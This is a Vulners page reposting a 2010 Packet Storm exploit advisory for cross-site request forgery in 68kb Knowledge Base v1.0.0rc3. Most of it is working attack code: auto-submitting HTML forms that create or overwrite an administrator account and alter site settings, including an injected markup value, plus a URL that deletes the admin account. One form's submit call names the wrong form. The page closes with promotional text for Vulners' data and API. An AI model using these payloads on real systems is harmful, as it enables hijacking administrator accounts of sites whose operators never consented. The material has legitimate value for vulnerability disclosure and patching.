Lucene search
K

68kb Knowledge Base 1.0.0rc3 Cross Site Request Forgery

🗓️ 03 Apr 2010 00:00:00Reported by Jelmer de HenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

Knowledge Base v1.0.0rc3 CSRF exploit

Code
`Exploit Title: 68kb Knowledge Base v1.0.0rc3 create administrator account CSRF  
Date: 2010-04-02  
Author: Jelmer de Hen  
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip  
Version: v1.0.0rc3  
  
<html>  
<body onload="document.forms["edit"].submit()">  
<form name="create" method="post" action="http://<server>/index.php/admin/users/add">  
<input type=hidden name="username" value="JohnDoe">  
<input type=hidden name="email" value="email">  
<input type=hidden name="level" value="1">  
<input type=hidden name="password" value="password">  
<input type=hidden name="passconf" value="password">  
</form>  
</body>  
</html>  
  
Exploit Title: 68kb Knowledge Base v1.0.0rc3 edit administrator account CSRF  
Date: 2010-04-02  
Author: Jelmer de Hen  
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip  
Version: v1.0.0rc3  
  
<html>  
<body onload="document.forms["edit"].submit()">  
<form name="edit" method="post" action="http://<server>/index.php/admin/users/edit/1">  
<input type=hidden name="username" value="JohnDoe">  
<input type=hidden name="email" value="email">  
<input type=hidden name="level" value="1">  
<input type=hidden name="password" value="password">  
<input type=hidden name="passconf" value="password">  
<input type=hidden name="id" value="1">  
</form>  
</body>  
</html>  
  
Exploit Title: 68kb Knowledge Base v1.0.0rc3 delete administrator account CSRF  
Date: 2010-04-02  
Author: Jelmer de Hen  
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip  
Version: v1.0.0rc3  
  
http://server/index.php/admin/users/delete/<id>  
  
The default id for the admin is 1.  
  
Exploit Title: 68kb Knowledge Base v1.0.0rc3 edit main settings CSRF  
Date: 2010-04-02  
Author: Jelmer de Hen  
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc3.zip  
Version: v1.0.0rc3  
  
<html>  
<body onload="document.forms['edit_settings'].submit()">  
<form name="edit_settings" action="http://server/index.php/admin/settings/main" method="post">  
<input type=hidden name="site_name" value="Your Site">  
<input type=hidden name="site_keywords" value='">escapable'>  
<input type=hidden name="site_description" value="">  
<input type=hidden name="site_email" value="[email protected]">  
<input type=hidden name="max_search" value="5">  
<input type=hidden name="comments" value="5">  
<input type=hidden name="cache_time" value="0">  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation